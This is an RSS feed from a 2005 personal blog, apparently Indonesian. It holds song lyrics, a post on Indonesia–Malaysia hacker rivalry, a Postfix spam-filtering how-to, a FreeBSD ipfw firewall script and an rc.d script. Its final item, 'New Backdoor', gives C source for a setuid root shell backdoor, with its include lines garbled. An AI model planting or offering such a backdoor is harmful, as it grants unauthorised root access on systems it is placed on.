<?xml version="1.0" encoding="utf-8"?><!-- generator="wordpress/1.5.1-alpha" -->
<rss version="0.92">
<channel>
	<title>TriBaL HardCoRE !</title>
	<link>http://mobi.blogsome.com</link>
	<description>my fuckin bloggie</description>
	<lastBuildDate>Mon, 11 Jul 2005 04:55:04 +0000</lastBuildDate>
	<docs>http://backend.userland.com/rss092</docs>
	<language>en</language>

	<item>
		<title>Washing Of The Water by: Peter Gabriel</title>
		<description>	River, river carry me on
Living river carry me on
River, river carry me on
To the place where I come from
	So deep, so wide, will you take me on your back for a ride
If I should fall, would you swallow me deep inside
	River, show me how to float
I feel like I&#8217;m sinking ...</description>
		<link>http://mobi.blogsome.com/2005/07/11/washing-of-the-water-by-peter-gabriel/</link>
	</item>
	<item>
		<title>Ganyang Ganyang</title>
		<description>	Indonesia Versus Malaysia
	
	
Sempet?nya gue ikutan Perang ama malay istilah kerennya Ganyang Malaysia hehehehePadahal itu kan urusan Negara kok kita ikut setres sih&#8230; gak jelas dahMending kita demo sendiri ajah deh TURUNKAN HARGA BBM dan harga Kondom.. buwahahha&#8230; kok jadi ngelantur gini dah? eswete.
	
Hacker Malay juga Gak tinggal diam ada sebagian ...</description>
		<link>http://mobi.blogsome.com/2005/03/16/ganyang-ganyang/</link>
	</item>
	<item>
		<title>Radio Head</title>
		<description>	Fake Plastic Trees
	
A green plastic watering canFor a fake chinese rubber plantIn the fake plastic earth
	
That she bought from a rubber manIn a town full of rubber plansTo get rid of itself
	
It wears her out, it wears her outIt wears her out, it wears her out
	
She lives with a broken ...</description>
		<link>http://mobi.blogsome.com/2005/03/16/radio-head/</link>
	</item>
	<item>
		<title>Reject Spam EmaiL</title>
		<description>	Postfix body checks Howto
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;
	Postfix body checks .. Reject Spam Mail
	Example Error:
	reject: body Microsoft Consumer from  kellylake96-79.cyberbeach.net[216.104.96.79];
from= to=
proto=ESMTP helo=:
We Dont Accept Mail From Spammers - Go Away
&#8212;
How To Do It!
	Postfix config dir is /usr/local/etc/postfix/
	cd /usr/local/etc/postfix
	Open the main.cf file in vi or ee
	add this line to the file
	body_checks = regexp:/usr/local/etc/postfix/body_checks
	exit save ...</description>
		<link>http://mobi.blogsome.com/2005/03/12/reject-spam-email/</link>
	</item>
	<item>
		<title>Scriptting ipfw</title>
		<description>	#!/bin/sh
# Firewall-Script / FreeBSD
	# Variablen
$ipfw=&#8221;/sbin/ipfw -qf&#8221;
$tcpmssd=&#8221;/usr/local/bin/tcpmssd&#8221;
	# Interfaces
##  Netzwerkkarte
if1=&#8221;ed0&#8243;
## DSL-Tunnel
if2=&#8221;tun0&#8243;
	# tcpmssd starten
$tcpmssd -m 1492 -p 1234
	# Regeln definieren
$ipfw flush
$ipfw add 51 divert 1234 tcp from any to any via $if2 setup
$ipfw add 100 deny all from any to 127.0.0.0/8 in recv $if2
$ipfw add 200 deny all from 10.0.0.0/8 to any ...</description>
		<link>http://mobi.blogsome.com/2005/03/12/scriptting-ipfw/</link>
	</item>
	<item>
		<title>Contoh Script rc.d on FreeBSD</title>
		<description>	rc.d example script startup shutdown
	#!/bin/sh
case &#8220;$1&#8243; in
start)
	/usr/local/sbin/some-app   
	echo &#8220;Starting Script&#8221;
	;;
stop)
	killall -15 some-app
	echo &#8220;Terminating Script&#8221;
	;;
*)
echo &#8220;Usage: `basename $0` {start|stop}&#8221; >&#038;2
exit 64
;;
esac
exit 0

 </description>
		<link>http://mobi.blogsome.com/2005/03/12/contoh-script-rcd-on-freebsd/</link>
	</item>
	<item>
		<title>New Backdoor</title>
		<description>	Source mobi.c
	#include
#include
#include
int main()
{
	setuid(0);
	setgid(0);
	system(&#8221;/bin/bash&#8221;);
	return 0;
}

 </description>
		<link>http://mobi.blogsome.com/2005/03/12/new-backdoor/</link>
	</item>
</channel>
</rss>
